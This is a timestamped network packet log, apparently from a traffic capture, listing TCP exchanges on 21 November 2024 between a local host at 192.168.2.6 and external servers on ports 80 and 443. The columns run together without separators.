                                                                                                                                                                              Nov 21, 2024 08:30:37.517893076 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.517894983 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517909050 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517920971 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.517921925 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517939091 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517952919 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.517954111 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517967939 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517981052 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.517997980 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518012047 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518013000 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.518024921 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518042088 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518055916 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518069983 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518075943 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.518085957 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518099070 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518112898 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518126011 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518131018 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.518155098 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518156052 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.518170118 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518182993 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.518183947 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518197060 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518210888 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518224001 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518238068 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.518238068 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518265963 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518279076 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518287897 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.518294096 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518306017 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518311977 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.518320084 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518333912 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518347979 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518358946 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.518361092 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518374920 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518388987 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518403053 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518414974 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.518418074 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518430948 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518445015 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.518445015 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518471956 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.518476009 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518487930 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518491983 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518492937 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518495083 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518496990 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518498898 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518501043 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518503904 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518506050 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518507957 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518510103 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518528938 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518537998 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518546104 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518554926 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518562078 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518577099 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518584967 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518594027 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518600941 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518620968 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518636942 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518651962 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518654108 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.518661022 CET4434976613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518722057 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.518779993 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518795967 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518810034 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518826962 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518827915 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.518841982 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518858910 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518879890 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518887997 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.518896103 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518902063 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518908024 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.518914938 CET49766443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:37.518922091 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.518959999 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.519196987 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.519213915 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.519231081 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.519267082 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.519293070 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.519331932 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.519349098 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.519366026 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.519381046 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.519396067 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.519407988 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.519412994 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.519428968 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.519437075 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.519443989 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.519463062 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.519481897 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.519488096 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.519498110 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.519520044 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.519550085 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.519792080 CET49767443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:37.519809961 CET49766443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:37.519814968 CET4434976713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.519826889 CET49767443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:37.519825935 CET4434976613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.519834042 CET4434976713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.519843102 CET49766443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:37.519848108 CET4434976613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.520272970 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.520426035 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.520509005 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.521162987 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.521270037 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.521361113 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.521742105 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.522033930 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.522147894 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.522419930 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.522923946 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.523026943 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.523087025 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.523812056 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.523920059 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.524091959 CET4434976813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.524178982 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.524465084 CET49772443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:37.524506092 CET4434977213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.524604082 CET49772443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:37.524702072 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.524799109 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.524862051 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.525296926 CET49772443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:37.525314093 CET4434977213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.525379896 CET49768443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:37.525412083 CET4434976813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.525578022 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.525684118 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.525738001 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.525815964 CET49768443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:37.525823116 CET4434976813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.526403904 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.526462078 CET49773443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:37.526494980 CET4434977313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.526912928 CET49773443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:37.527060986 CET49773443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:37.527076006 CET4434977313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.537552118 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.538817883 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.681710005 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.681791067 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.681984901 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.682008028 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.682110071 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.682837963 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.682929039 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.682975054 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.683046103 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.683623075 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.683726072 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.684354067 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.684432983 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.684533119 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.685240030 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.685307980 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.685311079 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.685424089 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.686100960 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.686309099 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.686361074 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.686923981 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.687025070 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.687077999 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.687768936 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.687907934 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.687973022 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.688543081 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.688618898 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.688754082 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.689327002 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.689445972 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.689512968 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.690176010 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.690334082 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.690474987 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.691010952 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.691132069 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.691323042 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.691812992 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.691890955 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.692601919 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.692668915 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.692699909 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.692819118 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.693430901 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.693531990 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.693734884 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.694242001 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.694343090 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.694834948 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.695053101 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.695194960 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.695305109 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.695883036 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.696029902 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.696089983 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.696718931 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.696827888 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.696872950 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.697521925 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.697724104 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.697808981 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.698350906 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.698460102 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.699019909 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.699172974 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.699276924 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.699966908 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.700011015 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.700033903 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.700068951 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.700798988 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.700911999 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.700969934 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.701622009 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.701731920 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.701781034 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.702446938 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.702547073 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.702773094 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.703244925 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.703366995 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.703674078 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.704061985 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.704188108 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.704881907 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.704962969 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.704993963 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.705065966 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.705729961 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.705847979 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.705990076 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.706538916 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.706644058 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.706686020 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.707379103 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.707443953 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.707526922 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.708146095 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.708271027 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.708432913 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.708990097 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.709134102 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.709662914 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.709793091 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.709907055 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.710614920 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.710701942 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.710731983 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.710810900 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.711435080 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.711549044 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.711610079 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.712263107 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.712373018 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.713042974 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.713087082 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.713181973 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.713893890 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.713958025 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.714011908 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.714051962 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.714684963 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.714797020 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.714910030 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.715593100 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.715675116 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.715735912 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.716341972 CET8049762185.215.113.16192.168.2.6
